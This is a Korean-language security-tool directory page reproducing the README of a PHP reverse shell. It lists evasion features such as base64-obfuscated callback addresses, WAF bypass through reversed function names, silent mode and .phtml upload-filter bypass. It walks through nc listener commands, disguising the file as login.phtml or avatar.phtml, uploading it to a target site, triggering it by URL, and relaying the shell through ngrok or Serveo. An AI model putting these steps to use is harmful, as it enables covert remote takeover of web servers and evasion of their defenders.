Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PHP-REVERSE-SHELL — 강력하고 은밀한 PHP 리버스 셸로, 윤리적 해킹 및 침투 테스트를 위해 설계되었습니다. 안정적이고 조용한 연결을 사용자 시스템으로 되돌립니다. | Kitploit
도구/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Payload GenerationIDS/IPS EvasionWeb Application ExploitationWAF BypassPenetration TestingCommand and ControlLearning & EducationRed TeamingRemote Access Tool
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

강력하고 은밀한 PHP 리버스 셸로, 윤리적 해킹 및 침투 테스트를 위해 설계되었습니다. 안정적이고 조용한 연결을 사용자 시스템으로 되돌립니다.

111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

PHP 리버스 셸 (강력하고 은밀함)

이것은 모의 해킹 및 침투 테스트를 위해 설계된 강력하고 은밀한 PHP 리버스 셸입니다. 사용자 시스템으로 안정적이고 조용한 연결을 설정합니다.

⚠️ 면책 조항

이 PHP 리버스 셸은 교육 및 승인된 침투 테스트 목적으로만 개발되었습니다.
개발자는 이 리버스 셸을 사용하여 수행된 모든 오용, 손해 또는 불법 활동에 대해 책임을 지지 않습니다.
책임감 있게 사용하고, 소유하거나 명시적인 테스트 허가를 받은 시스템에서만 사용하십시오. 무단 접근은 불법이며 법적으로 처벌받을 수 있습니다.

기능

  • IP 및 셸 명령이 Base64로 인코딩되어 은밀함 유지
  • 함수 이름을 역순으로 사용하여 WAF 및 보안 필터 우회
  • 무음 모드 — 탐지를 피하기 위해 출력 표시 안 함
  • 연결이 끊어지면 자동으로 재연결
  • 백그라운드 데몬으로 실행 가능 (서버 지원 시)
  • 대부분의 PHP 지원 서버에서 작동
  • Ngrok, Serveo와 같은 터널링 서비스 지원
  • .phtml 확장자로 업로드하여 일부 필터 우회

사용 방법

1. 사용자 시스템에서 리스너 시작

root@kitploit:~
nc -lvnp 4444

2. IP 또는 호스트 이름을 Base64로 인코딩

다음 간단한 명령을 사용하세요:

root@kitploit:~
echo "your_ip_or_hostname" | base64

예시:

root@kitploit:~
echo "192.168.1.5" | base64

출력을 복사하여 PHP 리버스 셸 스크립트의 $ip_b64 값을 교체하십시오.

3. PHP 리버스 셸 스크립트 업데이트:

다음 줄을 Base64로 인코딩된 IP/호스트 이름 및 포트로 변경하세요:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. 파일 이름을 변경하고 업로드

파일 이름을 덜 의심스러운 이름으로 변경하세요, 예시:

  • login.phtml

  • avatar.phtml

  • update.phtml

.phtml 확장자를 사용하면 .php를 차단하는 일부 서버에서 파일이 실행되도록 도와줍니다.

이 파일을 파일 업로드가 허용된 대상 웹사이트에 업로드하세요.

5. 리버스 셸 트리거

업로드된 파일을 브라우저에서 엽니다:

root@kitploit:~
http://target.com/uploads/login.phtml

열리면 리스너가 리버스 셸 연결을 수신합니다.

터널링 사용하기 (IP가 공개되지 않은 경우)

모바일 데이터를 사용하거나 라우터(NAT) 뒤에 있는 경우 IP가 공개되지 않을 수 있습니다. 이 경우 리버스 셸이 사용자 시스템에 직접 연결할 수 없습니다. 이를 해결하려면 Ngrok 또는 Serveo와 같은 TCP 터널링 도구를 사용하세요.

Ngrok (권장)

Ngrok 설치
다음 명령 실행:

root@kitploit:~
ngrok tcp 4444

다음과 같은 결과가 표시됩니다:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

PHP 리버스 셸 스크립트 업데이트:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

리스너 시작:

root@kitploit:~
nc -lvnp 4444

Serveo

다음 명령 실행:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

다음과 같은 메시지가 표시됩니다:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

PHP 리버스 셸 스크립트 업데이트:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

리스너 시작:

root@kitploit:~
nc -lvnp 4444

라이선스

이 프로젝트는 GNU General Public License v3.0에 따라 라이선스가 부여됩니다.

도구 다운로드